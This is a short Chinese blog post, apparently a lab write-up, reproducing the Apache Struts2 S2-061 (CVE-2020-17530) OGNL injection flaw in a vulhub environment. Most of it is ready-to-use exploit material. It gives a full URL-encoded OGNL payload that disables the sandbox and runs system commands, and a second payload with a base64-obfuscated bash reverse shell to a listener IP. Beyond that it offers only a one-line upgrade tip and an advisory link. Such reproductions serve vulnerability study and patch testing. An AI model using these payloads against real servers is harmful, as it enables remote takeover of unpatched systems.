Struts2 S2-061_CVE-2020-17530

漏洞简介

Apache Struts2框架是一个用于开发Java EE网络应用程序的Web框架。Apache Struts于2020年12月08日披露 S2-061 Struts 远程代码执行漏洞(CVE-2020-17530),在使用某些tag等情况下可能存在OGNL表达式注入漏洞,从而造成远程代码执行,风险极大。
 

影响版本

  • Apache Struts 2.0.0 – 2.5.25

漏洞复现

搭建vulhub的s2-061的环境

这里已经提示参数id,如真实环境需爆破参数。

执行命令

payload:http://172.31.84.221:8080/?id=%25{(%27Powered_by_Unicode_Potats0%2cenjoy_it%27).(%23UnicodeSec+%3d+%23application[%27org.apache.tomcat.InstanceManager%27]).(%23potats0%3d%23UnicodeSec.newInstance(%27org.apache.commons.collections.BeanMap%27)).(%23stackvalue%3d%23attr[%27struts.valueStack%27]).(%23potats0.setBean(%23stackvalue)).(%23context%3d%23potats0.get(%27context%27)).(%23potats0.setBean(%23context)).(%23sm%3d%23potats0.get(%27memberAccess%27)).(%23emptySet%3d%23UnicodeSec.newInstance(%27java.util.HashSet%27)).(%23potats0.setBean(%23sm)).(%23potats0.put(%27excludedClasses%27%2c%23emptySet)).(%23potats0.put(%27excludedPackageNames%27%2c%23emptySet)).(%23exec%3d%23UnicodeSec.newInstance(%27freemarker.template.utility.Execute%27)).(%23cmd%3d{%27id%27}).(%23res%3d%23exec.exec(%23cmd))}

反弹shell

生成反弹shell ,并监听

修改命令,执行后浏览器有明显的延迟,再看接收到shell

工具检测

项目地址

Poc检测,未报错就是存在漏洞

Exp,填写IP和port后生成payload,监听后执行即可getshell。

172.31.84.221:8080/?id=%25%7B%0A(%23request.map%3D%23application.get('org.apache.tomcat.InstanceManager').newInstance('org.apache.commons.collections.BeanMap')).toString().substring(0%2C0)%20%2B%20%0A(%23request.map.setBean(%23request.get('struts.valueStack'))%20%3D%3D%20true).toString().substring(0%2C0)%20%2B%20%0A(%23request.map2%3D%23application.get('org.apache.tomcat.InstanceManager').newInstance('org.apache.commons.collections.BeanMap')).toString().substring(0%2C0)%20%2B%0A(%23request.map2.setBean(%23request.get('map').get('context'))%20%3D%3D%20true).toString().substring(0%2C0)%20%2B%20%0A(%23request.map3%3D%23application.get('org.apache.tomcat.InstanceManager').newInstance('org.apache.commons.collections.BeanMap')).toString().substring(0%2C0)%20%2B%20%0A(%23request.map3.setBean(%23request.get('map2').get('memberAccess'))%20%3D%3D%20true).toString().substring(0%2C0)%20%2B%20%0A(%23request.get('map3').put('excludedPackageNames'%2C%23application.get('org.apache.tomcat.InstanceManager').newInstance('java.util.HashSet'))%20%3D%3D%20true).toString().substring(0%2C0)%20%2B%20%0A(%23request.get('map3').put('excludedClasses'%2C%23application.get('org.apache.tomcat.InstanceManager').newInstance('java.util.HashSet'))%20%3D%3D%20true).toString().substring(0%2C0)%20%2B%0A(%23application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec(%7B%27bash%20-c%20%7Becho%2CYmFzaCAtaSA%2BJiAvZGV2L3RjcC8xNzIuMzEuODQuMjIxLzY1NTM1IDA%2BJjE%3D%7D%7C%7Bbase64%2C-d%7D%7C%7Bbash%2C-i%7D%27%7D))%0A%7D

漏洞原理

原文地址,我太菜了 不是现在这个水平能看懂的….

修复建议

将Apache Struts框架升级至最新版本

相关链接

https://cwiki.apache.org/confluence/display/WW/S2-061

留下评论